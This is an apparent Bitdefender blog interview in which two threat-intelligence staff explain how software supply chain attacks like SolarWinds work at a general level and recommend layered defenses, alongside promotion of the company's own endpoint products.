Bitdefender data suggests IT teams face murky waters in 2021, as the disruptive shift to remote work and cloud-based operations continues to create security blind spots attackers can exploit. With the SolarWinds breach sending ripples well into the future, supply chain attacks are top of mind. Now is the best time to consider a truly robust cybersecurity tool stack, as no technology layer can prevent attacks that silently climb the supply chain ladder.
Unpatched vulnerabilities, human error, misconfigurations and poor cybersecurity defenses threaten not just the organizations that harbor them, but also their customers. In 2021, business clients stand to inherit any security lapses that their vendors exhibit. That’s what happened in a recent hack, when a poisoned software update from SolarWinds made it into the infrastructures of tens of thousands of customers leveraging its Orion IT management platform. In all, some 18,000 organizations fell victim to what is believed to be a large-scale intelligence gathering campaign.
Motivated politically or economically, advanced threat actors are increasingly targeting smaller companies to gain access to bigger targets. To understand the dangers of supply chain attacks and how to protect against them, we sat down with Dragos Gavrilut, our director of Cyber Threat Intelligence Lab, and Cristina Vatamanu, senior team lead, Cyber Threat Intelligence Lab for their perspectives.
Q: How do supply chain attacks work from a technical standpoint?
Dragos: A supply chain attack is any cyberattack that seeks to tamper with the production process of a third-party software package in such a way that the delivered package is malicious. Attackers first compromise the supplier using common techniques like targeted phishing emails, malicious websites, guessing weak passwords, abusing Remote Desktop Protocol, etc. Then they move to find the production server (GitHub, Apache Subversion, etc.) where versioning development occurs on the company’s product. Here, the attackers change the software build currently in production, lacing it with malicious code, taking care to hide their tracks. When development is finished and the update is ready for shipping, the company unknowingly signs it with a valid certificate and sends it off to its customers. The customers are inadvertently infected when they deploy the new software, not knowing it’s been tainted.
From the attackers’ perspective, as long as they can infect the supplier, each one of supplier’s customers also gets infected. The supplier is usually just a means to an end. While the end target may have robust cybersecurity layers in place, the supplier may not and offer a much easier path to compromise. Because the software packages are signed with trusted security certificates, the software is deemed safe and no alarm bells go off. That’s what makes it so devilishly efficient!
Q: Do you anticipate more supply chain attacks this year? Are any type of organizations or verticals more at risk?
Cristina: Definitely. In the context of cyber-espionage, we shouldn’t be surprised to see more headlines in 2021 akin to the SolarWinds hack. Yes, government entities are on attackers’ radar now more than ever. Critical infrastructures are likely also a target, in the same context. Financially motivated hackers will extort any entity that has enough capital to pay a ransom. There really isn’t a vertical that’s safe.
But if I were to name one vertical, I’d say service providers are in the attackers’ crosshairs most. Let me emphasize that; service providers are at the heart of the definition of “supply chain attack.” The business model perfectly facilitates infiltrating customer infrastructures. Once the provider is compromised, detecting the attack on the customers’ end is difficult, giving malicious actors enough time to gain the upper hand and inflict damage – from data exfiltration to malware infection to disrupting systems and processes. It’s a nightmare!
Q: What can organizations do to protect themselves?
Dragos: Considering the magnitude of the SolarWinds event and similar attacks over the years, you’d say supply chain attacks are a tough nut to crack; and you’d be right. The fact is, most organizations, big or small, don’t have the arsenal or the acumen required to fend off this invisible threat that seems to mushroom from within. And when they do detect it, it’s likely too late.
When we talk supply chain attacks, what we aim to achieve in terms of defenses is a multi-layered approach. I say this because the attack itself occurs in multiple phases. For example, simply compromising the supplier does not constitute a supply chain attack, in and of itself. However, a connection to the command and control center during this phase is likely to happen. This means that dynamic technologies – threat intel, for example – could detect some artifacts from the attack, like a connection to an unusual IP, or a flagged domain.
The vast majority of advanced attacks are targeted, meaning the threat actors designed a way to avoid preemptive methods of detection. If the attacker manages to modify code sources, build-scripts, etc. this is where we can finally say the supply chain attack is truly unfolding. At this point, you want a combination of EDR technology and MDR services to sniff out anomalies and generate alerts when suspicious events happen. Otherwise you could infect your clients when your next patch or product update is shipped. Endpoint Risk Analytics provides even more context in such occurrences, and we can proudly say we have the industry’s first endpoint risk analytics capability integrated into endpoint protection.